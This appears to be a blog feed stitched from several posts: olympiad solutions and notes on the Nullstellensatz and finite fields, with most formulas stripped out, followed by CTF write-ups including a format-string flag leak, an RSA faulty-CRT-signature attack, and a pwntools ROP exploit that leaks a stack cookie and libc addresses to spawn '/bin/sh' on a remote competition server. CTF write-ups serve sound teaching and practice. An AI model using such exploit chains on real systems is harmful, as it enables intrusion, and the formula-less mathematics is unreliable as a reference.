Nullstellensatz: Let be an algebraically closed field and an ideal of . Then is maximal if and only if .
It is not hard to see that is a maximal ideal. We can compute an isomorphism by looking at the surjective ring map . It remains to show that all maximal ideals are of this form. We will prove a subset of cases for as follows.
Cheap Nullstellensatz: Let be an algebraically closed field of uncountable cardinality and an ideal of . If is maximal then .
Proof: We do it in a few parts.
If is a non-trivial extension of (i.e. ), then must have a transcendental element , and for all non-zero . Thus, we can define the map and we claim this is an embedding of into . It is clearly well-defined because if , then does not divide by zero. It is also easy to check that this is a ring map and because , we can see that it is injective because its kernel is .
We clear denominators and call the resulting function , or
Now consider the ring homomorphisms sending to and for all , compute
The product is a product of non-zero elements and thus invertible, so we can calculate for all , and thus the set is linearly independent of uncountable cardinality, so has uncountable dimension over .
for some so is some sub-algebra of the free algebra . The free algebra has countable basis so must also have countable basis.
We now have all the building blocks to finish the proof. We notice that is a finitely generated -algebra, and its quotient field must also be a finitely generated field extension. If is a transcendental extension, then it has uncountable dimension over because it contains as a subfield, but this dimension is also countable because is finitely generated. Thus cannot be transcendental so it must be an algebraic extension, but is algebraically closed so .
]]>
If , prove that the polynomial
has no positive roots.
Solution A1: We appeal to a similar strategy that is used in IMO 2012-2. Write
In particular, for , this implies
so with equality only at . Thus , which is equivalent to has no positive roots.
]]>Problem 4: A site is any point in the plane such that and are both positive integers less than or equal to .
Initially, each of the sites is unoccupied. Amy and Ben take turns placing stones with Amy going first. On her turn, Amy places a new red stone on an unoccupied site such that the distance between any two sites occupied by red stones is not equal to . On his turn, Ben places a new blue stone on any unoccupied site. (A site occupied by a blue stone is allowed to be at any distance fromany other occupied site.) They stop as soon as a player cannot place a stone.
Find the greatest such that Amy can ensure that she places at least red stones, no matter how Ben places his blue stones.
Solution 4: The given condition is equivalent to placing knights on a chessboard, with one party blocking a space every other turn. It is well known that on a chessboard, you can place knights by placing knights in the black squares in the rows, and this is easily discoverable by playing around with placements a for a bit. Thus, if Ben blocks a placement every other turn, we can only place pieces on half of the squares described above, so for the case in a board, we conjecture that .
It remains to show that is indeed impossible. To do this, we show that , or that Ben can play in a way such that Amy can only place at most stones. To do this, we study the grid (tiled times) as distinct -cycles as follows:
If Amy places a stone in , Ben will place his stone in the opposite corner of . This ensures that Amy can no longer place any more stones in . Since there are regions per grid, Amy can only place stones per grid. Thus, Amy can place at maximum of stones if Bob plays in this manner and we are done.
Problem 5: Let be an infinite sequence of positive integers. Suppose that there is an integer such that for each , the number
is an integer. Prove that there is a positive integer such that for all .
Solution 5: The key to this problem is to use a size argument on -adic valuations to guarantee convergence of the . We consider two consecutive sums, whose difference
must be an integer because the two sums are integers. Let where are defined as but . This is the standard -adic valuation. Note that because this difference is an integer, its -adic valuation must be non-negative. This is a fact that will used repeatedly.
Now for all primes , consider
For this case, we have , meaning that the remaining terms in the difference must also satisfy
The trick here is to figure out where goes. If , then which is bad because . Else if , then which is also bad because . We start at the base case and inductively go onwards to show this for all .
and
We also wish to rank somewhere between and to get eventual constant-ness. We claim that
Clearly is impossible by assumption, so we wish to invalidate the case . In this case, we have so in order for the of the difference to be non-negative, the of the other two terms must agree, or
a contradiction. Thus by induction (again) we have shown that is eventually constant.
Combining both these claims yields the desired result. For each of the finitely many primes dividing , eventually becomes constant. That COMBINED WITH the fact for all implies for all eventually and because of this, must be constant.
A caveat as noted by v_Enhance, we need the non-increasing condition in the first claim because otherwise setting where is a good sequence and is the -th prime causes a contradiction!
Problem 1: Let be the circumcircle of acute-angled triangle . Points and lie on segments and , respectively, such that . The perpendicular bisectors of and intersect at the minor arcs and of at points and , respectively. Prove that the lines and are parallel (or are the same line).
Solution 1: This was more of an exercise in angle chasing than an actual problem and felt really out of place, even for a problem 1.
Extend and to and on , respectively. The goal is to show that are concyclic. Then, by using transversal , we have
which solves the problem. We do this with more angle chasing. Compute
Also compute
This gives us the relation and similarly . This is sufficient to show that lie on the circle centered at passing through points so is cyclic and we are done.
Problem 2: Find all integers for which there exist real numbers , such that and and
for .
Solution 2: This problem seemed kind of easy for a problem 2, or maybe I’m just getting better at math despite not doing any contest math for several years now.
We start by examining the case . We have the equations
We can substitute for in the third equation to obtain
which implies either or . Let’s just say for now that . Then and , so are the roots of the polynomial . We then notice that the sequence will go on as indefinitely, so is definitely valid.
This begs the question of: are these the only solutions? This suggests looking at the indices modulo , and there are only a few ways to obtain some nice looking equalities from the given conditions involving , , and . First, we know from the condition that . If we substitute , we obtain
which totally suggests that there is something going on between and . When you have a general equality and you have no idea what to do with it, taking the sum is usually not a bad choice so we do that here to obtain (we also extend the sequence so that is infinite with cycle of length ):
The equality really suggests that the sequence should be cyclic with length , so let’s try to prove it! Recall the AM-GM equality, where if we have non-negative numbers , then . We apply it to the LHS to obtain . Taking the sum over the first terms, we have
Since the two sides are actually equal by the previous computation, the equality condition of AM-GM must be met, or . Thus the cycle length divides , so it must either be three or one. We have seen previously that three works, so we focus our efforts on one. A cycle length of one means that the sequence is constant, or and
but that equation has no real roots.
The answer is then all such that .
]]>Theorem: Let be the number of monic irreducible polynomials in . Then
Proof:
Consider the following zeta function.
There are only monic polynomials of degree so
Monic polynomials have a unique factorization into monic polynomial factors, after some computation, we can arrive at
where are the monic irreducible polynomials of . We can then compute the equality
Recall that . Substituting, we get
Let us examine the coefficient of of the LHS. We compute
or
as desired.
We now construct finite fields in a different way.
Theorem: Any field has an algebraic closure and its closure is unique up to isomorphism.
Proof: This is actually a fun exercise and proofs of this result can be found almost everywhere.
Theorem: Let be the algebraic closure of . Let , where is a power of . Then is the unique field with elements contained in .
Proof: We first verify that is a field. Namely, and . clearly has elements because splits into distinct linear factors over and those factors are distinct (compute gcd with derivative).
Now let be some other subfield of with elements. is a group with elements so we have , and we can trivially extend this to for , so . But , so .
We can rephrase the above theorem as follows. is the splitting field of the polynomial over .
Theorem: Let be an arbitrary finite field with elements. Let be an irreducible polynomial of degree and let be one of its roots. Then is a field with elements.
Proof: This is a standard exercise with respect to field extensions.
Anyways, now for some problems.
Problem 1: (IMO Shortlist 1989) Suppose an integer sequence satisfies
for all . Prove that for all .
Solution: Let us compute the Möbius inversion. We get
Recall that elements of satisfy the polynomial . We count the number of elements of order precisely . Namely, we need to subtract off elements of orders with (can you see why?). We can do this with PIE, which is precisely the formula above. So is the number of elements in with order . Now consider the set of minimal polynomials of these elements. They must have degree , otherwise they would also belong in for some , and each of these polynomials has distinct roots in , so we are done.
Problem 2: (IMO Shortlist) Let , . If and , show that .
Solution: We first obtain a formual for . Check that
This means that , or . Set to obtain , so
Let be a prime factor of . Pick some in such that . Notice
so and . Define a map given by . This is a ring homomorphism. Let . are non-zero because . Additionally, . Now compute
Therefore and the order of MUST be (otherwise is impossible), so . Suppose . Then we know that so trivially . Now suppose not. Then are roots of irreducible . Raising the equality to the -th power, we get that . If , then is either or . If , then so we must have the latter, , which implies . But then, , so we trivially obtain .
Problem: (China TST 2008) Let . Let be an odd prime and be a prime divisor of . Prove that if , then .
Solution: Compute
Like, before, we can take in and define the ring homomorphism . Let and . We clearly have
Compute and using a similar trick in the previous problem, compute
so . Let us focus on the equality . If , then the order is either , , or . If the order is , then and , and squaring yields which is only true in , but . If the order is , then , so or . If , then forces ( is an odd prime). Similarly, if , then . If the order is , then , or , or or , both which eventually give the desired inequality. Notice that this only works if is not a quadratic residue mod . However, if is a quadratic residue mod , then we get either or , both of which yield the desired result.
]]>We say a field with multiplicative identity has characteristic if . If is infinite then it has characteristic . We are primarily interested in the finite case.
We get this nice little corollary: Let be a field of positive characteristic . Then is prime.
Proof: Suppose is not prime. Then and , so has zero divisors and is not a field.
Here is another really easy to understand corollary: Let be a field of characteristic . Then is a vector space over .
Proof: Trivial. Just write out the canonical action via and everything just works.
If you’ve taken any sort of linear algebra, we now realize that because is finite dimensional over , we can write , and the standard notation for this is .
The obvious question now is, given , can we construct a field of that size, and the answer is yes. Let be an irreducible polynomial in of degree . I claim is a field of size and characteristic .
Proof: Characteristic is quite easily seen because of the base ring taking coefficients in . To see that this quotient has elements, we can see that each of the polynomials of of degree less than are distinct and there are precisely of those. For polynomials of degree at least , we can replace them with polynomials of degree less than , so this works. More precisely, for each term of degree , we can find a polynomial of of degree such that has degree less than because is a field and we repeat until the degrees are within the desired range.
Okay, so this is at least a ring, but how are we so sure that it is a field? One easy way to see this comes from the theory of commutative rings. If is a commutative ring and is a maximal ideal, then is a field, and is maximal if and only if is irreducible (the ideal generated by one of the factors is a “larger” ideal). We will prove the previous statement.
Proof: Let be commutative and be a maximal ideal. Let be non-zero so that is non-zero. Define . This is clearly non-empty so take and write , where it becomes quite obvious that . Now take some , compute , so is also an ideal. On the other hand, we have , but and , so , but is maximal so , so , or there exists such that , or , and .
So now all that remains is to show that there is always some irreducible polynomial and we can always construct a finite field. We will need the following useful theorems.
Theorem 1: If is a finite field, then the group of units is cyclic and there is a generator with order .
Proof: We follow the classical proof of showing the existence of primitive roots modulo . In fact, this is precisely the analogous statement for primitive roots modulo but for finite fields.
Let . For all , we define the set . Any element has an order that divides , so this forms a partition. Namely,
I claim for any we have . If is empty, we are done so pick any element of order from . In particular, this means that are distinct solutions of . This polynomial has at most solutions in and thus in as well (it’s easy to check that zero is not a solution). Hence if we pick arbitrary , there exists some such that , but the order of is precisely , so . The set has precisely elements, and is a subset of that, which gives us the result.
We then recall that the sum
This implies that via a simple size argument. In particular, we now know that and any element of should generate by definition.
Theorem 2: The product of all irreducible monic polynomials such that is .
Proof: Let be this product. is squarefree in because it is relatively prime to its derivative, which is . Thus to show that , we only need to show that they share the same monic irreducible factors.
Let be a monic irreducible factor of of degree . Then is a finite field with elements. I claim that for all . Write . We have, by the freshman dream, the following computation.
where the final equality stems from the fact that . Now pick of order , so we obtain , so monic irreducible factors of have degree that divides .
Now take some that is monic, irreducible, and of degree . Take as a field with elements, so . Since , we easily obtain , which is what we needed.
Corollary: If is the number of monic irreducible polynomials in of degree , then
Proof: We know that is the product of all monic irreducible polynomials with degree dividing . Taking the degrees of both sides of this equality yields
which is precisely what we wanted.
Another corollary: for all .
Proof: We take the Möbius inversion of the above equality. In particular, this yields,
Note that so the RHS is most definitely positive, so .
All that is really left to show for basic properties of finite fields is that they are unique up to isomorphism. Namely, if are both irreducible polynomials of the same degree, then . I leave this as an exercise to the reader.
So why finite fields? Well a lot of modern cryptography is done over finite fields. Namely, AES does computations in . Elliptic curves can also be defined over any field. In particular, cryptography is interested in the case where the fields are finite. Elliptic curves over presents a lot of rich structure as well, but is not of any real cryptographic use to my knowledge. More specifically, standard ECC and ECDH can be done over any finite field, but in the case of SIDH (supersingular isogeny Diffie-Hellman), our curves are over . Visually, it makes absolutely no sense to visualize polynomials as coordinate points but the algebra checks out and that’s all you really need to care about. Visualizations over and maybe should give you enough intuition to work in other fields. Anyways, I am excited to see more uses of finite fields to confuse a bunch of aspiring CS students as well as whatever people will use it for in the future.
]]>machines[i].__init__.__globals__
had our flag, so as long as we could get our format string to contain “machine” after the check, we are in the clear. Luckily, there are 3 hex characters in “mAChinE”, so setting our data pointer to 0xAC, 0xA, 0xC, 0xE with the corresponding %x in the correct place in the format string “{machine.__init__.__globals__[flag]}” would print out the flag. The reference solution is posted below.
from interpreter import interpret_program prog = ">"*0xac format_attack = "{m%xhine.__init__.__globals__[flag]}" for char in format_attack: prog += "+"*ord(char) + ">" prog += "<"*len(format_attack) prog += '.' interpret_program(prog) print(prog)]]>
from binascii import hexlify from fractions import gcd import rsa pub, priv = rsa.newkeys(2048) with open('flag.txt') as f: flag = f.read() signme = 1337 q = priv.q p = priv.p d = priv.d e = priv.e n = priv.n # RSA signatures are way too slow I'm gonna go sanic def egcd(a, b): if a == 0: return (b, 0, 1) else: g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def modinv(a, m): g, x, y = egcd(a, m) if g != 1: raise Exception('modular inverse does not exist') else: return x % m s1 = pow(signme, d % (p - 1), p) s2 = pow(signme, d % (p - 1), q) qinv = modinv(q, p) h = (qinv * (s1 - s2)) % p s = s2 + h * q print "parameters:" print e print n print "signed 1337 with" print s print "encrypted flag" print hexlify(rsa.encrypt(flag, pub))
Initially, you should try to verify the signature and compute , and realize that it is not . We eventually notice that , which is incorrect, so we pull out a pencil and paper and calculate.
We can then just compute to get , where is taken modulo . The chances of are really small, so this works most of the time.
]]>Interestingly enough, every time we tried to leak the stack cookie it started with a null byte. We have a read primitive (actually just a function) at 0x80488b1 which we can leverage to read off entries from the plt. With this, we can grab libc addresses to fingerprint a specific version and then find offsets to the functions we want. Stacks are also cleaned up by the caller, so we need to return back to the main loop to retrigger our ROP chain every time we call a new function.
#! /usr/bin/env python2 from pwn import remote, p32, u32, args, log choicestr = "Select menu > " inputstr = "Input Your Message : " if args['REMOTE']: r = remote("110.10.212.130", 8888) else: r = remote("localhost", 8181) r.recvuntil(choicestr) # r.sendline("1") # r.recvuntil(inputstr) # r.send("A" * 41) # v = r.recvuntil(choicestr) # x = v[40:] # print x.encode("hex") # cookie = x[1:4] cookie = "00228d33".decode("hex") pl_base = "A" * 40 + cookie + "BBBB" + "CCCC" + "DDDD" loop = 0x8048a71 # we can use this to leak libc addresses #log.info("print(__libc_start_main)") #r.sendline("1") #r.recvuntil(inputstr) #r.send(pl_base + p32(0x80488b1) + p32(loop) + p32(0x804b03c)) #r.recvuntil(choicestr) #r.sendline("3") #res = r.recvuntil(choicestr) # __libc_start_main = 0xf75ef990 setsockopt = 0xf765c5d0 libc_base = setsockopt - 0x000ed5d0 system = libc_base + 0x00040190 binsh = libc_base + 0x00160a24 dup2 = libc_base + 0x000db590 alarm = libc_base + 0x000b54c0 # go back to the loop to do a new rop call log.info("alarm(0)") r.sendline("1") r.recvuntil(inputstr) pl = pl_base + p32(alarm) + p32(loop)+ p32(0) r.send(pl) r.recvuntil(choicestr) r.sendline("3") r.recvuntil(choicestr) log.info("dup2(4, 0)") r.sendline("1") r.recvuntil(inputstr) pl = pl_base + p32(dup2) + p32(loop)+ p32(4) + p32(0) r.send(pl) r.recvuntil(choicestr) r.sendline("3") r.recvuntil(choicestr) log.info("dup2(4, 1)") r.sendline("1") r.recvuntil(inputstr) pl = pl_base + p32(dup2) + p32(loop)+ p32(4) + p32(1) r.send(pl) r.recvuntil(choicestr) r.sendline("3") r.recvuntil(choicestr) log.info("system(\"/bin/sh\")") r.sendline("1") r.recvuntil(inputstr) pl = pl_base + p32(system) + p32(loop)+ p32(binsh) r.send(pl) r.recvuntil(choicestr) r.sendline("3") r.interactive() # FLAG{Good_Job~!Y0u_@re_Very__G@@d!!!!!!^.^}]]>